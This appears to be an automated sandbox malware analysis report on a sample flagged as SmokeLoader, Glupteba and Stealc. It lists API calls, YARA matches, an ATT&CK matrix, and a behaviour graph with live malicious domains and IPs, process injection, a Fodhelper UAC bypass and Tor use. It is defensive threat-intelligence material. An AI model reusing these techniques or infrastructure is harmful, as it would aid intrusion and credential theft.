                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_0040B1BE
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_0040A244
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_0040AED0
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_004092EC
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,7_2_00404EB4
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0040DB5E
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,7_2_005CBB00
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_0040DF26
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,7_2_0040B72B
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_004093C6
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,7_2_00410FD4
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: EnumSystemLocalesA,7_2_0040DFE8
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: GetLocaleInfoA,16_2_004051FC
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: GetLocaleInfoA,16_2_00405248
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: GetLocaleInfoA,18_2_00408558
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: GetLocaleInfoA,18_2_004085A4
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeQueries volume information: C:\Users\user\AppData\Local\Temp\914D.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00420FB0 FreeEnvironmentStringsW,ReadEventLogA,CreateNamedPipeA,FileTimeToLocalFileTime,0_2_00420FB0
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005CBF60 GetSystemTimes,GetSystemTimes,FlushFileBuffers,GetVolumeInformationW,FlushFileBuffers,GetVolumeInformationW,7_2_005CBF60
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00455570 GetUserNameA,18_2_00455570
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_00405CE4 GetVersionExA,16_2_00405CE4
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Glupteba
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.2d80e67.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.288c47bbc1871b439df19ff4df68f076.exe.3670000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.1932113759.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.1834912962.0000000003AB2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1943821340.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 37.2.AD52.exe.1f0e67.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.AD52.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.AD52.exe.2d30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1913902392.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1658865401.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1432875681.0000000000511000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1659020384.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1854293498.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Socks5Systemz
                      Source: Yara matchFile source: 0000001A.00000002.3843084252.0000000002CB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.3842255006.0000000002708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Stealc
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Yara detected Glupteba
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.2d80e67.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.288c47bbc1871b439df19ff4df68f076.exe.3670000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.1932113759.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.1834912962.0000000003AB2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1943821340.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 37.2.AD52.exe.1f0e67.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.AD52.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.AD52.exe.2d30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1913902392.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1658865401.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1432875681.0000000000511000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1659020384.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1854293498.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Socks5Systemz
                      Source: Yara matchFile source: 0000001A.00000002.3843084252.0000000002CB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.3842255006.0000000002708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Stealc
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		Valid Accounts21
                      Windows Management Instrumentation                      		1
                      Scripting                      		1
                      Exploitation for Privilege Escalation                      		1
                      Disable or Modify Tools                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		13
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts3
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop ProtocolData from Removable Media11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution                      		1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		Security Account Manager2
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      PowerShell                      		1
                      Bootkit                      		1
                      Access Token Manipulation                      		3
                      Obfuscated Files or Information                      		NTDS38
                      System Information Discovery                      		Distributed Component Object ModelInput Capture1
                      Multi-hop Proxy                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script413
                      Process Injection                      		22
                      Software Packing                      		LSA Secrets1
                      Query Registry                      		SSHKeylogging4
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		Cached Domain Credentials561
                      Security Software Discovery                      		VNCGUI Input Capture125
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion                      		DCSync261
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal Capture2
                      Proxy                      		Exfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Masquerading                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadow11
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation                      		Network Sniffing3
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd413
                      Process Injection                      		Input Capture1
                      Remote System Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                      Hidden Files and Directories                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                      Regsvr32                      		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                      Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                      Bootkit                      		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1389372 Sample: IIBXMzS0zN.exe Startdate: 08/02/2024 Architecture: WINDOWS Score: 100 127 tceducn.com 2->127 129 soetegem.com 2->129 131 13 other IPs or domains 2->131 175 Snort IDS alert for network traffic 2->175 177 Found malware configuration 2->177 179 Malicious sample detected (through community Yara rule) 2->179 181 18 other signatures 2->181 12 IIBXMzS0zN.exe 2->12         started        15 egiibgt 2->15         started        17 svchost.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 signatures5 191 Detected unpacking (changes PE section rights) 12->191 193 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->193 195 Maps a DLL or memory area into another process 12->195 197 Creates a thread in another existing process (thread injection) 12->197 21 explorer.exe 72 27 12->21 injected 199 Multi AV Scanner detection for dropped file 15->199 201 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->201 203 Checks if the current machine is a virtual machine (disk enumeration) 15->203 26 WerFault.exe 17->26         started        28 WerFault.exe 17->28         started        process6 dnsIp7 135 selebration17io.io 91.215.85.120, 49711, 80 PINDC-ASRU Russian Federation 21->135 137 asx.sunaviat.com 172.67.221.35, 49717, 80 CLOUDFLARENETUS United States 21->137 139 6 other IPs or domains 21->139 93 C:\Users\user\AppData\Roaming\ejiibgt, PE32 21->93 dropped 95 C:\Users\user\AppData\Roaming\egiibgt, PE32 21->95 dropped 97 C:\Users\user\AppData\Local\TempE8C.exe, PE32 21->97 dropped 99 11 other malicious files 21->99 dropped 185 Benign windows process drops PE files 21->185 187 Deletes itself after installation 21->187 189 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->189 30 78A4.exe 2 21->30         started        33 914D.exe 21->33         started        36 5A89.exe 21->36         started        40 7 other processes 21->40 38 Conhost.exe 26->38         started        file8 signatures9 process10 dnsIp11 109 C:\Users\user\AppData\Local\Temp\...\78A4.tmp, PE32 30->109 dropped 43 78A4.tmp 30->43         started        111 C:\Users\user\AppData\...\InstallSetup4.exe, PE32 33->111 dropped 113 C:\Users\user\AppData\Local\...\FourthX.exe, PE32+ 33->113 dropped 115 C:\...\288c47bbc1871b439df19ff4df68f076.exe, PE32 33->115 dropped 159 Multi AV Scanner detection for dropped file 33->159 45 InstallSetup4.exe 33->45         started        50 288c47bbc1871b439df19ff4df68f076.exe 33->50         started        52 FourthX.exe 33->52         started        161 Contains functionality to inject code into remote processes 36->161 163 Drops PE files with benign system names 36->163 165 Injects a PE file into a foreign processes 36->165 54 5A89.exe 3 13 36->54         started        141 gemcreedarticulateod.shop 104.21.80.171, 443, 49715 CLOUDFLARENETUS United States 40->141 143 secretionsuitcasenioise.shop 104.21.16.152 CLOUDFLARENETUS United States 40->143 145 3 other IPs or domains 40->145 167 Detected unpacking (changes PE section rights) 40->167 169 Machine Learning detection for dropped file 40->169 171 Contains functionality to infect the boot sector 40->171 173 4 other signatures 40->173 56 regsvr32.exe 40->56         started        58 WerFault.exe 40->58         started        60 csrss.exe 40->60         started        62 WerFault.exe 40->62         started        file12 signatures13 process14 dnsIp15 64 78A4.exe 43->64         started        147 5.42.64.33 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 45->147 149 185.172.128.127 NADYMSS-ASRU Russian Federation 45->149 151 185.172.128.90 NADYMSS-ASRU Russian Federation 45->151 117 C:\Users\user\AppData\Local\...\nsxAC73.tmp, PE32 45->117 dropped 119 C:\Users\user\AppData\Local\...\INetC.dll, PE32 45->119 dropped 121 C:\Users\user\AppData\...\BroomSetup.exe, PE32 45->121 dropped 123 C:\Users\user\AppData\...\syncUpd[1].exe, PE32 45->123 dropped 205 Multi AV Scanner detection for dropped file 45->205 67 BroomSetup.exe 45->67         started        70 Conhost.exe 45->70         started        207 Detected unpacking (changes PE section rights) 50->207 209 Detected unpacking (overwrites its own PE header) 50->209 211 UAC bypass detected (Fodhelper) 50->211 213 Suspicious powershell command line found 52->213 72 powershell.exe 52->72         started        153 127.0.0.1 unknown unknown 54->153 155 86.59.21.38 UTA-ASAT Austria 54->155 157 16 other IPs or domains 54->157 125 C:\ProgramData\Drivers\csrss.exe, PE32 54->125 dropped 215 Found Tor onion address 54->215 217 May use the Tor software to hide its network traffic 54->217 219 Tries to detect sandboxes / dynamic malware analysis system (file name check) 56->219 file16 signatures17 process18 file19 89 C:\Users\user\AppData\Local\Temp\...\78A4.tmp, PE32 64->89 dropped 74 78A4.tmp 64->74         started        183 Multi AV Scanner detection for dropped file 67->183 77 cmd.exe 67->77         started        79 conhost.exe 72->79         started        signatures20 process21 file22 101 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 74->101 dropped 103 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 74->103 dropped 105 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 74->105 dropped 107 31 other files (28 malicious) 74->107 dropped 81 anyburnfree.exe 74->81         started        84 anyburnfree.exe 74->84         started        87 conhost.exe 77->87         started        process23 dnsIp24 91 C:\ProgramData\...\IMAP List Mailboxes 65.exe, PE32 81->91 dropped 133 bercekp.com 185.196.8.22 SIMPLECARRER2IT Switzerland 84->133 file25

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      IIBXMzS0zN.exe82%ReversingLabsWin32.Trojan.SmokeLoader
                      IIBXMzS0zN.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exe100%Joe Sandbox ML
                      C:\ProgramData\Drivers\csrss.exe100%Joe Sandbox ML
                      C:\ProgramData\Drivers\csrss.exe88%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)3%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-2MD1R.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-5C03R.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-5HMK4.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-72Q7F.tmp3%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-7FTBB.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-9633C.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-BNUL3.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-CABAS.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-E4NNM.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-I193V.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-M6VRO.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-P1HCF.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-PUUKO.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\is-SB997.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)0%ReversingLabs
